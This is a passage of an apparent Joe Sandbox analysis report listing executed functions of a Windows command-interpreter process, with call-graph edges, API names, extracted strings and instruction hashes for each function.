22734 7ff6e9444492 22732->22734 22739 7ff6e944463e 22733->22739 22740 7ff6e9444695 22733->22740 22741 7ff6e9427348 168 API calls 22734->22741 22746 7ff6e94272b0 168 API calls 22736->22746 22755 7ff6e9427323 22736->22755 22737->22729 22737->22734 22749 7ff6e9444475 22737->22749 22742 7ff6e9427348 168 API calls 22738->22742 22739->22732 22751 7ff6e9444654 22739->22751 22748 7ff6e94273d4 168 API calls 22740->22748 22761 7ff6e94444a8 22741->22761 22762 7ff6e9444549 22742->22762 22743 7ff6e9427315 22802 7ff6e94273d4 22743->22802 22744 7ff6e9427348 168 API calls 22744->22750 22745 7ff6e9427348 168 API calls 22745->22743 22754 7ff6e944480e 22746->22754 22765 7ff6e944469a 22748->22765 22749->22732 22749->22740 22750->22731 22763 7ff6e9427348 168 API calls 22751->22763 22752 7ff6e94445b2 22756 7ff6e9427348 168 API calls 22752->22756 22753->22744 22754->22613 22755->22613 22759 7ff6e94445c7 22756->22759 22757 7ff6e944455e 22757->22752 22766 7ff6e9427348 168 API calls 22757->22766 22758 7ff6e94446e1 22764 7ff6e94272b0 168 API calls 22758->22764 22767 7ff6e9427348 168 API calls 22759->22767 22760 7ff6e94444e2 22769 7ff6e94272b0 168 API calls 22760->22769 22761->22760 22768 7ff6e9427348 168 API calls 22761->22768 22762->22752 22762->22757 22776 7ff6e9427348 168 API calls 22762->22776 22763->22755 22770 7ff6e9444738 22764->22770 22765->22758 22777 7ff6e94446c7 22765->22777 22778 7ff6e94446ea 22765->22778 22766->22752 22772 7ff6e94445db 22767->22772 22768->22760 22773 7ff6e94444f1 22769->22773 22771 7ff6e9427348 168 API calls 22770->22771 22771->22736 22774 7ff6e9427348 168 API calls 22772->22774 22775 7ff6e94272b0 168 API calls 22773->22775 22779 7ff6e94445ec 22774->22779 22780 7ff6e9444503 22775->22780 22776->22757 22777->22758 22784 7ff6e9427348 168 API calls 22777->22784 22781 7ff6e9427348 168 API calls 22778->22781 22782 7ff6e9427348 168 API calls 22779->22782 22780->22755 22783 7ff6e9427348 168 API calls 22780->22783 22781->22758 22785 7ff6e9444600 22782->22785 22783->22736 22784->22758 22786 7ff6e9427348 168 API calls 22785->22786 22786->22736 22790 7ff6e942735d 22787->22790 22788 7ff6e9423278 166 API calls 22789 7ff6e9444820 longjmp 22788->22789 22791 7ff6e9444838 22789->22791 22790->22788 22790->22790 22790->22791 22801 7ff6e94273ab 22790->22801 22792 7ff6e9423278 166 API calls 22791->22792 22793 7ff6e9444844 longjmp 22792->22793 22794 7ff6e944485a 22793->22794 22795 7ff6e9427348 166 API calls 22794->22795 22796 7ff6e944487b 22795->22796 22797 7ff6e9427348 166 API calls 22796->22797 22798 7ff6e94448ad 22797->22798 22799 7ff6e9427348 166 API calls 22798->22799 22800 7ff6e94272ff 22799->22800 22800->22743 22800->22745 22803 7ff6e9427401 22802->22803 22803->22755 22804 7ff6e9427348 168 API calls 22803->22804 22805 7ff6e944487b 22804->22805 22806 7ff6e9427348 168 API calls 22805->22806 22807 7ff6e94448ad 22806->22807 22808 7ff6e9427348 168 API calls 22807->22808 22809 7ff6e94448be 22808->22809 22809->22755

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00007FF6E9430A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                                                                                        • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                                                                                        • API String ID: 3305344409-4288247545
                                                                                                                                                                        • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                                                                                                                                                        • Instruction ID: d8c265ddad6b4c801b0f1a3f7ced96ce76b96d14dc3697a63a894a568eea3a58
                                                                                                                                                                        • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                                                                                                                                                        • Instruction Fuzzy Hash: 174290A3A08682C5EB65DF3198183B967A0AF89B94F444234D91EC77D5DF3EE54CC30A
                                                                                                                                                                        Function 00007FF6E942AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 216 7ff6e942aa54-7ff6e942aa98 call 7ff6e942cd90 219 7ff6e943bf5a-7ff6e943bf70 call 7ff6e9434c1c call 7ff6e942ff70 216->219 220 7ff6e942aa9e 216->220 221 7ff6e942aaa5-7ff6e942aaa8 220->221 223 7ff6e942acde-7ff6e942ad00 221->223 224 7ff6e942aaae-7ff6e942aac8 wcschr 221->224 229 7ff6e942ad06 223->229 224->223 226 7ff6e942aace-7ff6e942aae9 towlower 224->226 226->223 228 7ff6e942aaef-7ff6e942aaf3 226->228 231 7ff6e942aaf9-7ff6e942aafd 228->231 232 7ff6e943beb7-7ff6e943bec4 call 7ff6e944eaf0 228->232 233 7ff6e942ad0d-7ff6e942ad1f 229->233 235 7ff6e943bbcf 231->235 236 7ff6e942ab03-7ff6e942ab07 231->236 248 7ff6e943bec6-7ff6e943bed8 call 7ff6e9423240 232->248 249 7ff6e943bf43-7ff6e943bf59 call 7ff6e9434c1c 232->249 237 7ff6e942ad22-7ff6e942ad2a call 7ff6e94313e0 233->237 243 7ff6e943bbde 235->243 239 7ff6e942ab09-7ff6e942ab0d 236->239 240 7ff6e942ab7d-7ff6e942ab81 236->240 237->221 245 7ff6e943be63 239->245 246 7ff6e942ab13-7ff6e942ab17 239->246 244 7ff6e942ab87-7ff6e942ab95 240->244 240->245 255 7ff6e943bbea-7ff6e943bbec 243->255 251 7ff6e942ab98-7ff6e942aba0 244->251 258 7ff6e943be72-7ff6e943be88 call 7ff6e9423278 call 7ff6e9434c1c 245->258 246->240 252 7ff6e942ab19-7ff6e942ab1d 246->252 248->249 263 7ff6e943beda-7ff6e943bee9 call 7ff6e9423240 248->263 249->219 251->251 256 7ff6e942aba2-7ff6e942abb3 call 7ff6e942cd90 251->256 252->243 257 7ff6e942ab23-7ff6e942ab27 252->257 265 7ff6e943bbf8-7ff6e943bc01 255->265 256->219 270 7ff6e942abb9-7ff6e942abde call 7ff6e94313e0 call 7ff6e94333a8 256->270 257->255 261 7ff6e942ab2d-7ff6e942ab31 257->261 279 7ff6e943be89-7ff6e943be8c 258->279 261->229 267 7ff6e942ab37-7ff6e942ab3b 261->267 273 7ff6e943beeb-7ff6e943bef1 263->273 274 7ff6e943bef3-7ff6e943bef9 263->274 265->233 267->265 271 7ff6e942ab41-7ff6e942ab45 267->271 308 7ff6e942abe4-7ff6e942abe7 270->308 309 7ff6e942ac75 270->309 276 7ff6e943bc06-7ff6e943bc2a call 7ff6e94313e0 271->276 277 7ff6e942ab4b-7ff6e942ab4f 271->277 273->249 273->274 274->249 280 7ff6e943befb-7ff6e943bf0d call 7ff6e9423240 274->280 297 7ff6e943bc2c-7ff6e943bc4c _wcsnicmp 276->297 298 7ff6e943bc5a-7ff6e943bc61 276->298 283 7ff6e942ad2f-7ff6e942ad33 277->283 284 7ff6e942ab55-7ff6e942ab78 call 7ff6e94313e0 277->284 285 7ff6e942acbe 279->285 286 7ff6e943be92-7ff6e943beaa call 7ff6e9423278 call 7ff6e9434c1c 279->286 280->249 306 7ff6e943bf0f-7ff6e943bf21 call 7ff6e9423240 280->306 290 7ff6e942ad39-7ff6e942ad3d 283->290 291 7ff6e943bc66-7ff6e943bc8a call 7ff6e94313e0 283->291 284->221 293 7ff6e942acc0-7ff6e942acc7 285->293 337 7ff6e943beab-7ff6e943beb6 call 7ff6e9434c1c 286->337 300 7ff6e943bcde-7ff6e943bd02 call 7ff6e94313e0 290->300 301 7ff6e942ad43-7ff6e942ad49 290->301 314 7ff6e943bc8c-7ff6e943bcaa _wcsnicmp 291->314 315 7ff6e943bcc4-7ff6e943bcdc 291->315 293->293 303 7ff6e942acc9-7ff6e942acda 293->303 297->298 307 7ff6e943bc4e-7ff6e943bc55 297->307 312 7ff6e943bd31-7ff6e943bd4f _wcsnicmp 298->312 331 7ff6e943bd2a 300->331 332 7ff6e943bd04-7ff6e943bd24 _wcsnicmp 300->332 310 7ff6e943bd5e-7ff6e943bd65 301->310 311 7ff6e942ad4f-7ff6e942ad68 301->311 303->223 306->249 339 7ff6e943bf23-7ff6e943bf35 call 7ff6e9423240 306->339 322 7ff6e943bbb3-7ff6e943bbb7 307->322 308->285 324 7ff6e942abed-7ff6e942ac0b call 7ff6e942cd90 * 2 308->324 319 7ff6e942ac77-7ff6e942ac7f 309->319 310->311 323 7ff6e943bd6b-7ff6e943bd73 310->323 325 7ff6e942ad6d-7ff6e942ad70 311->325 326 7ff6e942ad6a 311->326 320 7ff6e943bd55 312->320 321 7ff6e943bbc2-7ff6e943bbca 312->321 314->315 329 7ff6e943bcac-7ff6e943bcbf 314->329 315->312 319->285 328 7ff6e942ac81-7ff6e942ac85 319->328 320->310 321->221 333 7ff6e943bbba-7ff6e943bbbd call 7ff6e94313e0 322->333 334 7ff6e943bd79-7ff6e943bd8b iswxdigit 323->334 335 7ff6e943be4a-7ff6e943be5e 323->335 324->337 356 7ff6e942ac11-7ff6e942ac14 324->356 325->237 326->325 340 7ff6e942ac88-7ff6e942ac8f 328->340 329->322 331->312 332->331 338 7ff6e943bbac 332->338 333->321 334->335 342 7ff6e943bd91-7ff6e943bda3 iswxdigit 334->342 335->333 337->232 338->322 339->249 357 7ff6e943bf37-7ff6e943bf3e call 7ff6e9423240 339->357 340->340 346 7ff6e942ac91-7ff6e942ac94 340->346 342->335 348 7ff6e943bda9-7ff6e943bdbb iswxdigit 342->348 346->285 353 7ff6e942ac96-7ff6e942acaa wcsrchr 346->353 348->335 349 7ff6e943bdc1-7ff6e943bdd7 iswdigit 348->349 354 7ff6e943bdd9-7ff6e943bddd 349->354 355 7ff6e943bddf-7ff6e943bdeb towlower 349->355 353->285 358 7ff6e942acac-7ff6e942acb9 call 7ff6e9431300 353->358 359 7ff6e943bdee-7ff6e943be0f iswdigit 354->359 355->359 356->337 360 7ff6e942ac1a-7ff6e942ac33 memset 356->360 357->249 358->285 363 7ff6e943be17-7ff6e943be23 towlower 359->363 364 7ff6e943be11-7ff6e943be15 359->364 360->309 365 7ff6e942ac35-7ff6e942ac4b wcschr 360->365 366 7ff6e943be26-7ff6e943be45 call 7ff6e94313e0 363->366 364->366 365->309 367 7ff6e942ac4d-7ff6e942ac54 365->367 366->335 368 7ff6e942ac5a-7ff6e942ac6f wcschr 367->368 369 7ff6e942ad72-7ff6e942ad91 wcschr 367->369 368->309 368->369 371 7ff6e942ad97-7ff6e942adac wcschr 369->371 372 7ff6e942af03-7ff6e942af07 369->372 371->372 373 7ff6e942adb2-7ff6e942adc7 wcschr 371->373 372->309 373->372 374 7ff6e942adcd-7ff6e942ade2 wcschr 373->374 374->372 375 7ff6e942ade8-7ff6e942adfd wcschr 374->375 375->372 376 7ff6e942ae03-7ff6e942ae18 wcschr 375->376 376->372 377 7ff6e942ae1e-7ff6e942ae21 376->377 378 7ff6e942ae24-7ff6e942ae27 377->378 378->372 379 7ff6e942ae2d-7ff6e942ae40 iswspace 378->379 380 7ff6e942ae4b-7ff6e942ae5e 379->380 381 7ff6e942ae42-7ff6e942ae49 379->381 382 7ff6e942ae66-7ff6e942ae6d 380->382 381->378 382->382 383 7ff6e942ae6f-7ff6e942ae77 382->383 383->258 384 7ff6e942ae7d-7ff6e942ae97 call 7ff6e94313e0 383->384 387 7ff6e942ae9a-7ff6e942aea4 384->387 388 7ff6e942aea6-7ff6e942aead 387->388 389 7ff6e942aebc-7ff6e942aef8 call 7ff6e9430a6c call 7ff6e942ff70 * 2 387->389 388->389 390 7ff6e942aeaf-7ff6e942aeba 388->390 389->319 397 7ff6e942aefe 389->397 390->387 390->389 397->279
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                                                                                        • String ID: :$:$:$:ON$OFF
                                                                                                                                                                        • API String ID: 972821348-467788257
                                                                                                                                                                        • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                        • Instruction ID: 9c40596f1326973e12df33aee824721af9d8f43258b3750f73bc2f4b8dc03744
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                        • Instruction Fuzzy Hash: 95229E63A18642D6FB64DF7598183B86691FF49B80F488035CA0EC77D5DE3EA44CC35A
                                                                                                                                                                        Function 00007FF6E94351EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 398 7ff6e94351ec-7ff6e9435248 call 7ff6e9435508 GetLocaleInfoW 401 7ff6e943524e-7ff6e9435272 GetLocaleInfoW 398->401 402 7ff6e943ef32-7ff6e943ef3c 398->402 403 7ff6e9435274-7ff6e943527a 401->403 404 7ff6e9435295-7ff6e94352b9 GetLocaleInfoW 401->404 405 7ff6e943ef3f-7ff6e943ef49 402->405 406 7ff6e94354f7-7ff6e94354f9 403->406 407 7ff6e9435280-7ff6e9435286 403->407 408 7ff6e94352bb-7ff6e94352c3 404->408 409 7ff6e94352de-7ff6e9435305 GetLocaleInfoW 404->409 410 7ff6e943ef4b-7ff6e943ef52 405->410 411 7ff6e943ef61-7ff6e943ef6c 405->411 406->402 407->406 413 7ff6e943528c-7ff6e943528f 407->413 414 7ff6e94352c9-7ff6e94352d7 408->414 415 7ff6e943ef75-7ff6e943ef78 408->415 416 7ff6e9435307-7ff6e943531b 409->416 417 7ff6e9435321-7ff6e9435343 GetLocaleInfoW 409->417 410->411 412 7ff6e943ef54-7ff6e943ef5f 410->412 411->415 412->405 412->411 413->404 414->409 418 7ff6e943ef99-7ff6e943efa3 415->418 419 7ff6e943ef7a-7ff6e943ef7d 415->419 416->417 420 7ff6e9435349-7ff6e943536e GetLocaleInfoW 417->420 421 7ff6e943efaf-7ff6e943efb9 417->421 418->421 419->409 424 7ff6e943ef83-7ff6e943ef8d 419->424 422 7ff6e9435374-7ff6e9435396 GetLocaleInfoW 420->422 423 7ff6e943eff2-7ff6e943effc 420->423 425 7ff6e943efbc-7ff6e943efc6 421->425 427 7ff6e943539c-7ff6e94353be GetLocaleInfoW 422->427 428 7ff6e943f035-7ff6e943f03f 422->428 426 7ff6e943efff-7ff6e943f009 423->426 424->418 429 7ff6e943efc8-7ff6e943efcf 425->429 430 7ff6e943efde-7ff6e943efe9 425->430 431 7ff6e943f00b-7ff6e943f012 426->431 432 7ff6e943f021-7ff6e943f02c 426->432 433 7ff6e943f078-7ff6e943f082 427->433 434 7ff6e94353c4-7ff6e94353e6 GetLocaleInfoW 427->434 435 7ff6e943f042-7ff6e943f04c 428->435 429->430 436 7ff6e943efd1-7ff6e943efdc 429->436 430->423 431->432 437 7ff6e943f014-7ff6e943f01f 431->437 432->428 442 7ff6e943f085-7ff6e943f08f 433->442 438 7ff6e94353ec-7ff6e943540e GetLocaleInfoW 434->438 439 7ff6e943f0bb-7ff6e943f0c5 434->439 440 7ff6e943f04e-7ff6e943f055 435->440 441 7ff6e943f064-7ff6e943f06f 435->441 436->425 436->430 437->426 437->432 444 7ff6e943f0fe-7ff6e943f108 438->444 445 7ff6e9435414-7ff6e9435436 GetLocaleInfoW 438->445 443 7ff6e943f0c8-7ff6e943f0d2 439->443 440->441 446 7ff6e943f057-7ff6e943f062 440->446 441->433 447 7ff6e943f0a7-7ff6e943f0b2 442->447 448 7ff6e943f091-7ff6e943f098 442->448 449 7ff6e943f0ea-7ff6e943f0f5 443->449 450 7ff6e943f0d4-7ff6e943f0db 443->450 453 7ff6e943f10b-7ff6e943f115 444->453 451 7ff6e943543c-7ff6e943545e GetLocaleInfoW 445->451 452 7ff6e943f141-7ff6e943f14b 445->452 446->435 446->441 447->439 448->447 454 7ff6e943f09a-7ff6e943f0a5 448->454 449->444 450->449 455 7ff6e943f0dd-7ff6e943f0e8 450->455 456 7ff6e9435464-7ff6e9435486 GetLocaleInfoW 451->456 457 7ff6e943f184-7ff6e943f18b 451->457 460 7ff6e943f14e-7ff6e943f158 452->460 458 7ff6e943f117-7ff6e943f11e 453->458 459 7ff6e943f12d-7ff6e943f138 453->459 454->442 454->447 455->443 455->449 462 7ff6e943548c-7ff6e94354ae GetLocaleInfoW 456->462 463 7ff6e943f1c4-7ff6e943f1ce 456->463 461 7ff6e943f18e-7ff6e943f198 457->461 458->459 464 7ff6e943f120-7ff6e943f12b 458->464 459->452 465 7ff6e943f15a-7ff6e943f161 460->465 466 7ff6e943f170-7ff6e943f17b 460->466 468 7ff6e943f19a-7ff6e943f1a1 461->468 469 7ff6e943f1b0-7ff6e943f1bb 461->469 470 7ff6e943f207-7ff6e943f20e 462->470 471 7ff6e94354b4-7ff6e94354f5 setlocale call 7ff6e9438f80 462->471 472 7ff6e943f1d1-7ff6e943f1db 463->472 464->453 464->459 465->466 467 7ff6e943f163-7ff6e943f16e 465->467 466->457 467->460 467->466 468->469 474 7ff6e943f1a3-7ff6e943f1ae 468->474 469->463 473 7ff6e943f211-7ff6e943f21b 470->473 476 7ff6e943f1dd-7ff6e943f1e4 472->476 477 7ff6e943f1f3-7ff6e943f1fe 472->477 478 7ff6e943f21d-7ff6e943f224 473->478 479 7ff6e943f233-7ff6e943f23e 473->479 474->461 474->469 476->477 481 7ff6e943f1e6-7ff6e943f1f1 476->481 477->470 478->479 482 7ff6e943f226-7ff6e943f231 478->482 481->472 481->477 482->473 482->479
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                        • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                        • API String ID: 1351325837-2236139042
                                                                                                                                                                        • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                        • Instruction ID: 2ca22a8d62fbf2c1e0eea160f63df73518fe4804e380967333710ee0b07453a0
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 46F15A63B18742D5EF218F35E9143B966A4BF04B84F948135CA0D877A4EF3EE949C30A
                                                                                                                                                                        Function 00007FF6E9434224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 483 7ff6e9434224-7ff6e94342a5 InitializeProcThreadAttributeList 484 7ff6e94342ab-7ff6e94342e5 UpdateProcThreadAttribute 483->484 485 7ff6e943ecd4-7ff6e943ecee GetLastError call 7ff6e9449eec 483->485 486 7ff6e94342eb-7ff6e94343c6 memset * 2 GetStartupInfoW call 7ff6e9433a90 call 7ff6e942b900 484->486 487 7ff6e943ecf0-7ff6e943ed19 GetLastError call 7ff6e9449eec DeleteProcThreadAttributeList 484->487 494 7ff6e943ed1e 485->494 497 7ff6e9434638-7ff6e9434644 _local_unwind 486->497 498 7ff6e94343cc-7ff6e94343d3 486->498 487->494 499 7ff6e9434649-7ff6e9434650 497->499 498->499 500 7ff6e94343d9-7ff6e94343dc 498->500 499->500 503 7ff6e9434656-7ff6e943465d 499->503 501 7ff6e94343de-7ff6e94343f5 wcsrchr 500->501 502 7ff6e9434415-7ff6e9434424 call 7ff6e9435a68 500->502 501->502 504 7ff6e94343f7-7ff6e943440f lstrcmpW 501->504 510 7ff6e9434589-7ff6e9434590 502->510 511 7ff6e943442a-7ff6e9434486 CreateProcessW 502->511 503->502 506 7ff6e9434663 503->506 504->502 507 7ff6e9434668-7ff6e943466d call 7ff6e9449044 504->507 506->500 507->502 510->511 514 7ff6e9434596-7ff6e94345fa CreateProcessAsUserW 510->514 513 7ff6e943448b-7ff6e943448f 511->513 515 7ff6e9434495-7ff6e94344c7 CloseHandle call 7ff6e943498c 513->515 516 7ff6e9434672-7ff6e9434682 GetLastError 513->516 514->513 519 7ff6e943468d-7ff6e9434694 515->519 520 7ff6e94344cd-7ff6e94344e5 515->520 516->519 521 7ff6e9434696-7ff6e94346a0 519->521 522 7ff6e94346a2-7ff6e94346ac 519->522 523 7ff6e94344eb-7ff6e94344f2 520->523 524 7ff6e94347a3-7ff6e94347a9 520->524 521->522 525 7ff6e94346ae-7ff6e94346b5 call 7ff6e94397bc 521->525 522->525 526 7ff6e9434705-7ff6e9434707 522->526 527 7ff6e94344f8-7ff6e9434507 523->527 528 7ff6e94345ff-7ff6e9434607 523->528 541 7ff6e94346b7-7ff6e9434701 call 7ff6e947c038 525->541 542 7ff6e9434703 525->542 526->520 530 7ff6e943470d-7ff6e943472a call 7ff6e942cd90 526->530 531 7ff6e943450d-7ff6e9434512 call 7ff6e9435cb4 527->531 532 7ff6e9434612-7ff6e9434616 527->532 528->527 533 7ff6e943460d 528->533 543 7ff6e943472c-7ff6e9434738 _local_unwind 530->543 544 7ff6e943473d-7ff6e9434767 call 7ff6e94313e0 call 7ff6e9449eec call 7ff6e942ff70 _local_unwind 530->544 547 7ff6e9434517-7ff6e943455e call 7ff6e94333f0 call 7ff6e943498c 531->547 539 7ff6e94347d7-7ff6e94347df 532->539 540 7ff6e943461c-7ff6e9434633 532->540 538 7ff6e943476c-7ff6e9434773 533->538 538->527 548 7ff6e9434779-7ff6e9434780 538->548 545 7ff6e94347e1-7ff6e94347ed CloseHandle 539->545 546 7ff6e94347f2-7ff6e943483c call 7ff6e942ff70 DeleteProcThreadAttributeList call 7ff6e9438f80 539->546 540->546 541->526 542->526 543->544 544->538 545->546 568 7ff6e94347ae-7ff6e94347ca call 7ff6e94333f0 547->568 569 7ff6e9434564-7ff6e9434579 call 7ff6e943498c 547->569 548->527 553 7ff6e9434786-7ff6e9434789 548->553 553->527 558 7ff6e943478f-7ff6e9434792 553->558 558->524 562 7ff6e9434794-7ff6e943479d call 7ff6e944a250 558->562 562->524 562->527 568->539 569->546 576 7ff6e943457f-7ff6e9434584 call 7ff6e944a920 569->576 576->546
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                                                                                        • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                                                                                        • API String ID: 388421343-2905461000
                                                                                                                                                                        • Opcode ID: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                                                                                                                                                        • Instruction ID: c024f5d33f1caef2cb71c9703c64383980c643c3d7048c96cf4362f78e1b4b1c
                                                                                                                                                                        • Opcode Fuzzy Hash: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                                                                                                                                                        • Instruction Fuzzy Hash: A6F12B73A19A86D6EB60DF21E4443BA77A4FF85B80F404135DA4D82795DF3EE448CB0A
                                                                                                                                                                        Function 00007FF6E9435554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
